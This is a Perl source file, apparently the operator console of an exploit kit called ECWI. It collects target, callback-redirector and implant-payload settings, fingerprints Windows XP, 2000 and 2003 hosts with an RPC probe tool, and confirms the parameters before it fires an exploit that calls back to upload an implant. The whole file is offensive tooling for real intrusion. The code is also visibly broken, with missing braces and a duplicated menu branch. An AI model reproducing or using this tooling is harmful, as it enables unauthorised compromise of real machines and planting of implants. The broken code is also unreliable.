# ---------------------------------------------------------------
# ---------------------------------------------------------------
# ---------------------------------------------------------------
# Get Call-Back Socket Options
# ---------------------------------------------------------------
($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus, $PayloadType);
if( $EggSocketStatus eq $::EGG_SOCKET_NEW) {
# ---------------------------------------------------------------
# Get Egg Callback IP Address and Port
# ---------------------------------------------------------------
&EU_Log(1, "\n");
&EU_Log(1, "*************************************************************************");
&EU_Log(1, "* The ECWI Exploit Payload must callback in order to upload the Implant *");
&EU_Log(1, "* Payload. The callback IP Address MUST be that of the Middle *");
&EU_Log(1, "* Redirector. The callback Port MUST be the same number on both the *");
&EU_Log(1, "* Middle Redirector and the local machine, else redirection will fail. *");
&EU_Log(1, "* The local machine uses this port to listen for the callback, and the *");
&EU_Log(1, "* ECWI Exploit Payload uses it to call back to the local machine *");
&EU_Log(1, "* through the Redirector. *");
&EU_Log(1, "*************************************************************************");
# Use Middle Redirector IP Address for Callback
$EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback(Middle Redirector) IP ", $EggCallbackIp);
&EU_Log(0, "Enter the Egg callback(Middle Redirector) IP Address: $EggCallbackIp");
# Prompt for Egg Callback Port
$EggCallbackPort = $DestinationPort * 10 + 1;
while(1) {
$EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
&EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
if($EggCallbackPort eq "0") {
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
} # End payload Callback
# ---------------------------------------------------------------
# Prompt for socket time-out value
# ---------------------------------------------------------------
&EU_Log(1, "\nThe default time-out value for the target connection is 60 sec.");
&EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)");
$retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y");
&EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode");
if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) {
$TimeOutValue = "60";
else {
$TimeOutValue = &EU_GetInput("Enter new time-out value (greater than 60): ");
&EU_Log(0, "Enter new time-out value (greater than 60): $TimeOutValue");
# ---------------------------------------------------------------
# Confirm Network Parameters
# ---------------------------------------------------------------
&EU_Log(1,"\nConfirm Network Parameters:");
&EU_Log(1,"\tRoot Directory : $root_dir");
&EU_Log(1,"\tLocal IP : $LocalIp");
&EU_Log(1,"\tPayload file : $PayloadFile");
&EU_Log(1,"\tPayload drop name : $PayloadDropName");
&EU_Log(1,"\tRideArea Option : $RideAreaOpt");
if( $redirectFlag ) {
&EU_Log(1,"\tUsing Redirection : True");
&EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
&EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
else {
&EU_Log(1,"\tUsing Redirection : False");
&EU_Log(1,"\tTarget IP : $DestinationIp");
&EU_Log(1,"\tTarget Port : $DestinationPort");
if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
&EU_Log(1,"\tEgg Socket Status : New");
if( $redirectFlag ) {
if( $callbackFlag eq $::PAYLOAD_LISTEN) {
&EU_Log(1,"\tListen Port : $EggListenPort");
&EU_Log(1,"\tCall In Port : $EggCallInPort");
&EU_Log(1,"\tCall In Timeout : $CallinTimeoutValue");
else {
&EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
&EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
else {
if( $callbackFlag eq $::PAYLOAD_LISTEN) {
&EU_Log(1,"\tListen Port : $EggListenPort");
&EU_Log(1,"\tCall In Port : $EggCallInPort");
&EU_Log(1,"\tCall In Timeout : $CallinTimeoutValue");
else {
&EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
&EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
&EU_Log(1,"\tEgg Socket Status : Reuse");
else {
&EU_Log(1,"\tEgg Socket Status : None");
if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
&EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
else {
&EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
&EU_Log(1,"\tTransport Protocol : $TransportProtocol");
&EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
&EU_Log(1,"\tRpc Connection flag : $RpcConnection");
&EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");
# Exploit is completely pre-auth, no creds required.
# if($UsingPassword == 1)
# {
# &EU_Log(1,"\tUsername : $Username");
# &EU_Log(1,"\tPassword : $Password");
# }
# if($UsingPassword == 2)
# {
# &EU_Log(1,"\tUsername : $Username");
# &EU_Log(1,"\tNTLM password hash : $NTHash");
# &EU_Log(1,"\tLANMAN password hash : $LMHash");
# }
$continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
&EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");
if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
; # continue on to probes section
elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
&EU_ExitMessage(1,"User terminated script\n");
else {
&EU_Log(1, "Returning to top of script...\n");
# ---------------------------------------------------------------
# Probe Target First
# To Do: probe the target within the touch_tool subroutine (if applicable)
# ---------------------------------------------------------------
my $touchFlag = "n"; # Reset this value everytime we enter the probe section
$WindowsVersion = $not; # Reset this value everytime we enter the probe section
#Use rpctouch2 to obtain os and service pack.
if($TransportProtocolSelected eq "1" || $TransportProtocolSelected eq "2")
#Check the windows Version
&EU_Log(1, "\nCurrent supported targets are XP-SP2, XP-SP3, 2K3-SP1, 2K3-SP2.");
$touchFlag = &EU_GetInput("\nUse RPCTOUCH touch option to obtain the Windows Version ([y],n)? ", "y");
&EU_Log(0, "\nUse RPCTOUCH touch option to obtain the Windows Version ([y],n)? $touchFlag");
if(($touchFlag eq "y") or ($touchFlag eq "Y"))
# ---------------------------------------------------------------
# ---------------------------------------------------------------
($WindowsVersion, $bError) = &launch_rpctouchii($root_dir,$TargetIp,$TargetPort,
$RPCTOUCHII_RUN_GENERAL_PROBE, $TargetTransportProtocol,
$TargetApplicationProtocol, $TargetServerIp, $TimeOutValue, $WindowsVersion);
# Parse Initial Touch Results
## Note over smb you don't need the second run because you know the difference between xp and 2003
#if( ($WindowsVersion == $::TARGET_VER_XP) and ($bError == 0) and ($ApplicationProtocol eq "NA"))
# ($WindowsVersion, $bError) = &launch_rpctouchii($root_dir,$TargetIp,$TargetPort, $RPCTOUCHII_RUN_WINDOWS_2003_PROBE, $TargetTransportProtocol, $TargetApplicationProtocol, $TargetServerIp, $TimeOutValue);
if( ($bError == 1) or ($WindowsVersion eq $::TARGET_VER_UNKNOWN) )
# ---------------------------------------------------------------
# ---------------------------------------------------------------
&EU_Log(1, "\n*** WARNING *** Recommend you STOP and re-evaluate before proceeding!");
$continue = &EU_GetInput("\nDo you wish to continue (y,n,[quit])? ", "quit");
&EU_Log(0, "\nDo you wish to continue (y,n,[quit])? $continue");
if( ($continue eq "quit") or ($continue eq "QUIT") or ($continue eq "q") or ($continue eq "Q") ) {
&EU_ExitMessage(1,"User terminated script\n");
elsif( ($continue eq "n") or ($continue eq "N") ) {
&EU_Log(1, "Returning to top of script...\n");
else { # User elected to ignore probe results and continue with exploit anyway
$touchFlag = "N";
# Select/Verify Target Version from Menu
&EU_Log(1,"\nSelect the target Windows Version:\n");
&EU_Log(1," 1) $wxpsp2 **default**"); # 2. Windows XP-SP2
&EU_Log(1," 2) $wxpsp3"); # 2. Windows XP-SP2
&EU_Log(1," 3) $ws2003sp1"); # 1. Windows Server 2003-SP1
&EU_Log(1," 4) $ws2003sp2"); # 1. Windows Server 2003-SP2
&EU_Log(1," 5) $w2ksp4"); # 1. Windows Server 2004-SP4
$retcode = &EU_GetInput("\nEnter selection : [1] ", "1" );
&EU_Log(0, "\nEnter selection : $retcode");
if($retcode == 1)
#$WindowsVersion = $::TARGET_VER_2K3;
$WindowsVersion = $wxpsp2;
elsif($retcode == 2)
#$WindowsVersion = $::TARGET_VER_XP;
$WindowsVersion = $wxpsp3;
elsif($retcode == 3)
#$WindowsVersion = $::TARGET_VER_XP;
$WindowsVersion = $ws2003sp1;
elsif($retcode == 4)
#$WindowsVersion = $::TARGET_VER_XP;
$WindowsVersion = $ws2003sp2;
elsif($retcode == 4)
#$WindowsVersion = $::TARGET_VER_2K;
$WindowsVersion = $w2ksp4;
&EU_Log(1, "Invalid option. Try again or enter 'quit'.");
} #End while(1)
} #Got/confirmed operating system
#If we found windows 2003 sp2, get a language from the operator.
# if(($WindowsVersion eq $ws2003sp2) or ($WindowsVersion eq $ws2003sp1))
# {
# &EU_Log(1,"\nSelect the target OS Language:");
# &EU_Log(1," 1) English");
# &EU_Log(1," 2) Other");
# while(1)
# {
# $retcode = &EU_GetInput("\nEnter selection : [1] ", 1);
# &EU_Log(0, "\nEnter selection : [1] ", 1);
# if($retcode == 1)
# {
# $WindowsVersion = $WindowsVersion."English";
# }
# elsif($retcode == 2)
# {
# $WindowsVersion = $WindowsVersion."Other";
# }
# else
# {
# &EU_Log(1, "\nInvalid option. Try again.");
# next;
# }
# last;
# }
# }
# #######################################
# # Find the ephemeral port
# #######################################
# $touchFlag = &EU_GetInput("\nUse RPCTOUCH to find ephemeral port number? ([y],n)? ", "y");
# &EU_Log(0, "\nUse RPCTOUCH to find ephemeral port number? ([y],n)? $touchFlag");
# my $attackPort = 0;
# if(($touchFlag eq "y") or ($touchFlag eq "Y") or ($touchFlag eq "yes") or ($touchFlag eq "YES"))
# {
# ($attackPort, $bError) = &launch_rpctouchii($root_dir,$TargetIp,$TargetPort,
# $RPCTOUCHII_RUN_RPC_INTERFACE_PORT, $TargetTransportProtocol, $TargetApplicationProtocol,
# $TargetServerIp, $TimeOutValue);
# if($attackPort == 0)
# {
# # ---------------------------------------------------------------
# # ---------------------------------------------------------------
# &EU_Log(1, "\n*** WARNING *** Recommend you STOP and re-evaluate before proceeding!");
# &EU_Log(1, "\nThis error could be occuring for serveral reasons:");
# &EU_Log(1, "\n1) The Target is not running the at service \n\t- (this attack vector is not available)");
# &EU_Log(1, "\n2) The Target is either an XP SP2 or 2003 SP1\n\t - (not vulnerable to this exploit)");
# $continue = &EU_GetInput("\nDo you wish to continue (y,n,[quit])? ", "quit");
# &EU_Log(0, "\nDo you wish to continue (y,n,[quit])? $continue");
# if( ($continue eq "quit") or ($continue eq "QUIT") or ($continue eq "q") or ($continue eq "Q") ) {
# &EU_ExitMessage(1,"User terminated script\n");
# }
# elsif( ($continue eq "n") or ($continue eq "N") ) {
# &EU_Log(1, "Returning to top of script...\n");
# next;
# }
# else { # User elected to ignore probe results and continue with exploit anyway
# $touchFlag = "N";
# }
# }# Error
# } # User said Yes
# # Confirm Results
# if( $redirectFlag == 0 )
# {
# $attackPort = &EU_GetInput("\nEnter the Target port: [$attackPort] ", $attackPort);
# &EU_Log(0,"\nTarget Port: $attackPort");
# #This makes more sense for Redirection
# $DestinationPort = $attackPort;
# $TargetPort = $attackPort;
# }
# else
# {
# &EU_Log(1,"NOTE: The exploit needs to be sent to port $attackPort on the target machine!!!");
# if( $attackPort < 6500)
# {
# $LPRedirectionPort = ($attackPort * 10 + 1);
# }
# else
# {
# $LPRedirectionPort = ($attackPort + 11);
# }
# $LPRedirectionPort = &EU_GetInput("\nEnter the Redirection port: [$LPRedirectionPort] ", $LPRedirectionPort);
# $DestinationPort = $attackPort;
# $TargetPort = $LPRedirectionPort;
# &EU_Log(0,"\tTarget Port: $LPRedirectionPort");
# }
# $touchFlag = &EU_GetInput("\nUse ECWI touch option to test for vulnerability ([y],n)? ", "y");
# &EU_Log(0,"nUse ECWI touch option to test for vulnerability ([y],n)?$touchFlag");
# } #Over Ephemeral port
# else # over named pipes
# {
# $touchFlag = &EU_GetInput("\nUse ECWI touch option to obtain the Windows Version ([y],n)? ", "y");
# &EU_Log(0," \nUse ECWI touch option to obtain the Windows Version ([y],n)? $touchFlag");
# }
# if(($touchFlag eq "y") or ($touchFlag eq "Y") or ($touchFlag eq "yes") or ($touchFlag eq "YES"))
# {
# # ---------------------------------------------------------------
# # ECWI Touch
# ($WindowsVersion, $bVulnerable, $bError) = &run_ecwitouch($root_dir,$TargetIp,$TargetPort,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue,$touch,$Username, $Password, $NTHash, $LMHash );
# # Parse Initial Touch Results
# #If XP and used usernames we need to do further testing for servicepack
# if(($WindowsVersion eq $wxp) && ($UsingPassword != 0 ))
# {
# $touch = $::RUN_PROBE_3;
# ($WindowsVersion, $bVulnerable, $bError) = &run_ecwitouch($root_dir,$TargetIp,$TargetPort,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection, $TargetServerIp, $TimeOutValue,$touch,$Username, $Password, $NTHash, $LMHash );
# }
# if( ($WindowsVersion eq $not) or ($bVulnerable == 0) or ($bError == 1) )
# {
# # ---------------------------------------------------------------
# &EU_Log(1, "\n*** WARNING *** Recommend you STOP and re-evaluate before proceeding!");
# $continue = &EU_GetInput("\nDo you wish to continue (y,n,[quit])? ", "quit");
# &EU_Log(0, "\nDo you wish to continue (y,n,[quit])? $continue");
# if( ($continue eq "q") or ($continue eq "Q") or ($continue eq "quit") or ($continue eq "QUIT") )
# {
# &EU_ExitMessage(1,"User terminated script\n");
# }
# elsif( ($continue eq "n") or ($continue eq "N") or ($continue eq "no") or ($continue eq "NO") )
# {
# &EU_Log(1, "Returning to top of script...\n");
# next;
# }
# else
# { # User elected to ignore probe results and continue with exploit anyway
# $touchFlag = "n";
# }
# }
# else {
# # ---------------------------------------------------------------
# $retcode = &EU_GetInput("\nUse \"$WindowsVersion\" as the target Windows Version ([y],n)? ", "y");
# &EU_Log(0,"\nUse \"$WindowsVersion\" as the target Windows Version ([y],n)? $retcode");
# if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") )
# {
# $retcode = &EU_GetInput("\n*CAUTION* Are you CERTAIN that you wish to defy the probe results (y,[n])? ", "n");
# &EU_Log(0,"\n*CAUTION* Are you CERTAIN that you wish to defy the probe results (y,[n])? $retcode");
# if( ($retcode eq "n") or ($retcode eq "N") or ($retcode eq "no") or ($retcode eq "NO") )
# {
# &EU_Log(1,"Good. Using probe results for the target machine type.\n");
# }
# else
# {
# while(1)
# {
# &EU_Log(1,"Select Windows Version:\n");
# if($touch eq $::RUN_PROBE_1)
# {
# &EU_Log(1,"\t2) Windows NT4\n\t3) Windows 2000");
# }
# &EU_Log(1,"\t4) Windows XP (SP1 and below)\n\t5) Windows Server 2003 (base release)\n");
# $WindowsVersion = &EU_GetInput("\nSelect Windows Version: ", "3");
# &EU_Log(0,"\nSelect Windows Version: $WindowsVersion");
# if(!(($WindowsVersion eq "2") or ($WindowsVersion eq "3") or ($WindowsVersion eq "4") or ($WindowsVersion eq "5")))
# {
# next;
# }
# else
# {
# if($WindowsVersion eq 2)
# {
# $WindowsVersion = $nt4;
# }
# elsif($WindowsVersion eq 3)
# {
# $WindowsVersion = $w2k;
# }
# elsif($WindowsVersion eq 4)
# {
# $WindowsVersion = $wxp;
# }
# elsif($WindowsVersion eq 5)
# {
# $WindowsVersion = $ws2003;
# }
# }
# last;
# }#end while
# }
# }
# }
# }
# else {
# &EU_Log(1,"Select Windows Version:\n");
# if($touch ne $::RUN_PROBE_2) {
# &EU_Log(1,"\t2) Windows NT4\n\t3) Windows 2000");
# }
# &EU_Log(1,"\t4) Windows XP (SP1 and below)\n\t5) Windows Server 2003 (base release)\n");
# $WindowsVersion = &EU_GetInput("\nSelect Windows Version: ", "3");
# &EU_Log(0,"\nSelect Windows Version: $WindowsVersion");
# if(!(($WindowsVersion eq "2") or ($WindowsVersion eq "3") or ($WindowsVersion eq "4") or ($WindowsVersion eq "5"))) {
# &EU_Log(1, "Invalid Windows selection.\nReturning to top of script...\n");
# next;
# }
# }
# ---------------------------------------------------------------
# Check Socket Reuse vs. Windows NT 4.0
#if(($EggSocketStatus eq $::EGG_SOCKET_REUSE) and ($WindowsVersion eq $nt4)) {
# &EU_Log(1, "\nERROR: Egg socket option REUSE is not supported on $nt4.");
# &EU_Log(1, "Please select the option to create a NEW socket.");
# next;
# ---------------------------------------------------------------
# Confirm Network Parameters
# To Do: redisplay Confirm Network Parameters
# ---------------------------------------------------------------
&EU_Log(1,"\nConfirm Network Parameters:");
&EU_Log(1,"\tRoot Directory : $root_dir");
&EU_Log(1,"\tLocal IP : $LocalIp");
&EU_Log(1,"\tPayload file : $PayloadFile");
&EU_Log(1,"\tPayload drop name : $PayloadDropName");
&EU_Log(1,"\tRideArea Option : $RideAreaOpt");
if( $redirectFlag ) {
&EU_Log(1,"\tUsing Redirection : True");
&EU_Log(1,"\tLP Redirector IP : $LPRedirectionIp");
&EU_Log(1,"\tLP Redirector Port : $LPRedirectionPort");
else {
&EU_Log(1,"\tUsing Redirection : False");
&EU_Log(1,"\tTarget IP : $DestinationIp");
&EU_Log(1,"\tTarget Port : $DestinationPort");
if( $EggSocketStatus eq $::EGG_SOCKET_NEW ) {
&EU_Log(1,"\tEgg Socket Status : New");
if( $redirectFlag ) {
&EU_Log(1,"\tEgg Callback IP : $EggCallbackIp (Middle Redirector)");
else {
&EU_Log(1,"\tEgg Callback IP : $EggCallbackIp");
&EU_Log(1,"\tEgg Callback Port : $EggCallbackPort");
elsif( $EggSocketStatus eq $::EGG_SOCKET_REUSE ) {
&EU_Log(1,"\tEgg Socket Status : Reuse");
else {
&EU_Log(1,"\tEgg Socket Status : None");
if( $ImplantSocketStatus eq $::IMPLANT_SOCKET_MAINTAIN ) {
&EU_Log(1,"\tExploit Socket Status : Maintain (Use existing connection for the entire operation.)");
else {
&EU_Log(1,"\tExploit Socket Status : Close (Existing connection will NOT be used for the entire operation.)");
&EU_Log(1,"\tTransport Protocol : $TransportProtocol");
&EU_Log(1,"\tApplication Protocol : $ApplicationProtocol");
&EU_Log(1,"\tRpc Connection flag : $RpcConnection");
&EU_Log(1,"\tNetwork Time Out : $TimeOutValue sec");
# if($UsingPassword == 1)
# {
# &EU_Log(1,"\tUsername : $Username");
# &EU_Log(1,"\tPassword : $Password");
# }
# if($UsingPassword == 2)
# {
# &EU_Log(1,"\tUsername : $Username");
# &EU_Log(1,"\tNTLM password hash : $NTHash");
# &EU_Log(1,"\tLANMAN password hash : $LMHash");
# }
&EU_Log(1,"\tWindows Version : $WindowsVersion");
$continue = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
&EU_Log(0, "\nContinue with the current values ([y],n,quit)? $continue");
if( ($continue eq "y") or ($continue eq "yes") or ($continue eq "Y") or ($continue eq "YES") ) {
elsif( ($continue eq "q") or ($continue eq "quit") or ($continue eq "Q") or ($continue eq "QUIT") ) {
&EU_ExitMessage(1,"User terminated script\n");
else {
&EU_Log(1, "Returning to top of script...\n");
} # end while
# ---------------------------------------------------------------
# Convert $WindowsVersion from Text Name to Numeral
#if( ($WindowsVersion eq $nt4) or ($WindowsVersion eq "2")) { $WindowsVersion = 2; }
#elsif( ($WindowsVersion eq $w2k) or ($WindowsVersion eq "3")) { $WindowsVersion = 3; }
#elsif( ($WindowsVersion eq $wxp) or ($WindowsVersion eq "4")) { $WindowsVersion = 4; }
#elsif( ($WindowsVersion eq $ws2003) or ($WindowsVersion eq "5")) { $WindowsVersion = 5; }
#else {$WindowsVersion = 0;}
# ---------------------------------------------------------------
# Return
# ---------------------------------------------------------------
return ($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
$EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
$WindowsVersion, $TargetServerIp,$Username, $Password, $NTHash, $LMHash, $callbackFlag, $EggListenPort, $EggCallInPort, $CallinTimeoutValue);
# G E T _ S O C K E T _ O P T I O N S
# Parameters:
# $_[0] = ImplantSocketStatus
# $_[1] = EggSocketStatus
# $_[2] = PayloadType
# Returns:
# Error code: 0 == No Error; 1 == Error.
# Globals:
# $ExploitUtils::EU_LOG
# $ExploitUtils::EU_EXITMESSAGE
# Program assumes that appropriate values for each of the specified input
# parameters were already validated.
sub get_socket_options()
my ($ImplantSocketStatus, $EggSocketStatus, $PayloadType) = @_;
my $opt;
# ---------------------------------------------------------------
# Get Egg Socket Option
&EU_Log(1,"\nThe ECWI Exploit Payload Must Call-back in Order to Upload the Implant Payload.");
$EggSocketStatus = $::EGG_SOCKET_NEW;
$ImplantSocketStatus = $::IMPLANT_SOCKET_MAINTAIN;
return ($ImplantSocketStatus, $EggSocketStatus);
# Parameters:
# $_[0] = callbackFlag
# Returns:
# Error code: 0 == No Error; 1 == Error.
# Globals:
# Program assumes that appropriate values for each of the specified input
# parameters were already validated.
sub get_payload_type()
my $retcode;
# ---------------------------------------------------------------
# Prompt for CALLBACK
# ---------------------------------------------------------------
$retcode = &EU_GetInput("\nWill this operation be CALLBACK ([y],n)? ", "y");
&EU_Log(0, "\nWill this operation be CALLBACK ([y],n)? $retcode");
if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") )
$callbackFlag = $::PAYLOAD_CALLBACK;
$callbackFlag = $::PAYLOAD_LISTEN;
return ($callbackFlag);
# R U N _ E L V T O U C H
# Parameters:
# $_[0] = Root Directory
# $_[1] = Target IP
# $_[2] = Target Port
# $_[3] = TargetTransportProtocol
# $_[4] = TargetApplicationProtocol
# $_[5] = RpcConnection
# $_[6] = TargetServerIp
# $_[7] = TimeOutValue
# $_[8] = touchType
# $_[9] = Username
# $_[10] = Password
# $_[11] = NTHash
# $_[12] = LMHash
# OS versions
# $not = "NOT GOOD";
# $w9x = "Windows 9x";
# $nt4 = "Windows NT 4.0";
# $w2k = "Windows 2000";
# $w2ksp0123 = "Windows 2000 Service Pack 0, 1, 2, or 3";
# $w2ksp4 = "Windows 2000 Service Pack 4";
# $wxp = "Windows XP";
# $wxpsp0 = "Windows XP Service Pack 0";
# $wxpsp1 = "Windows XP Service Pack 1";
# $wxpsp2 = "Windows XP Service Pack 2";
# $w2kXp = "Windows 2000 XP" ;
# $wxp2003 = "Windows XP Server 2003" ;
# $ws2003 = "Windows Server 2003";
# $ws2003sp1 = "Windows Server 2003 Service Pack 1";
# Returns:
# Error code: 0 == No Error; 1 == Error.
# Globals:
# $ExploitUtils::EU_LOG
# $ExploitUtils::EU_EXITMESSAGE
# Program assumes that appropriate values for each of the specified input
# parameters were already validated.
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
# L A U N C H _ R P C T O U C H I I
# Parameters:
# $_[0] = Root Directory
# $_[1] = Target IP
# $_[2] = Target Port
# $_[3] = Run Option
# $_[4] = Target Transport Protocol
# $_[5] = Target Application Protocol
# $_[6] = Target HTTP Server Ip (for use with RPC Protocol Sequence rpc_http only)
# $_[7] = Time Out Value
# RPCTOUCHII Probe types
# OS versions
# $not = "NOT GOOD";
# $w9x = "Windows 9x";
# $nt4 = "Windows NT 4.0";
# $w2k = "Windows 2000";
# $w2ksp0123 = "Windows 2000 Service Pack 0, 1, 2, or 3";
# $w2ksp4 = "Windows 2000 Service Pack 4";
# $wxp = "Windows XP";
# $wxpsp0 = "Windows XP Service Pack 0";
# $wxpsp1 = "Windows XP Service Pack 1";
# $wxpsp2 = "Windows XP Service Pack 2";
# $w2kXp = "Windows 2000 XP" ;
# $wxp2003 = "Windows XP Server 2003" ;
# $ws2003 = "Windows Server 2003";
# $ws2003sp1 = "Windows Server 2003 Service Pack 1";
# Returns:
# Error code: 0 == No Error; 1 == Error.
# Globals:
# $ExploitUtils::EU_LOG
# $ExploitUtils::EU_EXITMESSAGE
# Program assumes that appropriate values for each of the specified input
# parameters were already validated.
sub launch_rpctouchii() {
my ($root_dir, $TargetIp, $TargetPort, $RunOption, $TargetTransportProtocol, $TargetApplicationProtocol, $TargetServerIp, $TimeOutValue,$WindowsVersion) = @_;
my $handle = new FileHandle;
#my $AtsvcPort = "Unknown";
my $ProbeError = 0; # Return Value: 0 == No Error; 1 == Error
#my $MachineType = $not; # Return Value: $unpatched or $patched or $not or $w9x or $nt4 or $w2k or $wxp or $ws20003;
# call RPCII()
my $cmdline = "\"$root_dir\\$::RPCTOUCHII\" -i $TargetIp -p $TargetPort -r $RunOption -t $TargetTransportProtocol -b $TargetApplicationProtocol -h $TargetServerIp -o $TimeOutValue";
&EU_Log(0, "$cmdline");
&EU_Log(0, "Probing target...");
if(!open($handle, "$cmdline|")) {
&EU_ExitMessage(1, "Unable to execute $::REGPROBE");
my $junk;
my $line;
my $success = 0;
if( $RunOption eq $RPCTOUCHII_RUN_GENERAL_PROBE ) { # Parse Rpctouch() response to Probe Type RPCTOUCHII_RUN_GENERAL_PROBE
while(<$handle>) {
chomp($line = $_);
&EU_Log(1, $line);
if($line =~ /ERROR/)
$ProbeError = 1;
#$MachineType = $not;
$WindowsVersion = $::TARGET_VER_UNKNOWN;
elsif($line =~ /Looks like UNKNOWN Windows version/)
#$MachineType = $not;
$WindowsVersion = $::TARGET_VER_UNKNOWN;
elsif($line =~ /Looks like Windows XP Service Pack 2/)
#$MachineType = $wxp;
$WindowsVersion = $wxpsp2;
elsif($line =~ /Looks like Windows XP Service Pack 3/)
#$MachineType = $wxp;
$WindowsVersion = $wxpsp3;
elsif($line =~ /Looks like Windows 2003 Service Pack 0/)
#$MachineType = $ws2003;
$WindowsVersion = $ws2003sp0;
elsif($line =~ /Looks like Windows 2003 Service Pack 1/)
#$MachineType = $ws2003;
$WindowsVersion = $ws2003sp1;
elsif($line =~ /Looks like Windows 2003 Service Pack 2/)
#$MachineType = $ws2003;
$WindowsVersion = $ws2003sp2;
elsif($line =~ /Looks like Windows 2000/)
$WindowsVersion = $w2ksp4;
elsif($line =~ /RPCTOUCHII 1.0.2/)
$ProbeError = 1;
&EU_ExitMessage(1, "RPCTOUCH2 1.0.2 Detected. This exploit REQUIRED rpctouch2 v.1.0.4!!! Bailing...");
elsif($line =~ /RPCTOUCHII 1.0.3/)
$ProbeError = 1;
&EU_ExitMessage(1, "RPCTOUCH2 1.0.3 Detected. This exploit REQUIRED rpctouch2 v.1.0.4!!! Bailing...");
} #while
} #if
return($WindowsVersion, $ProbeError);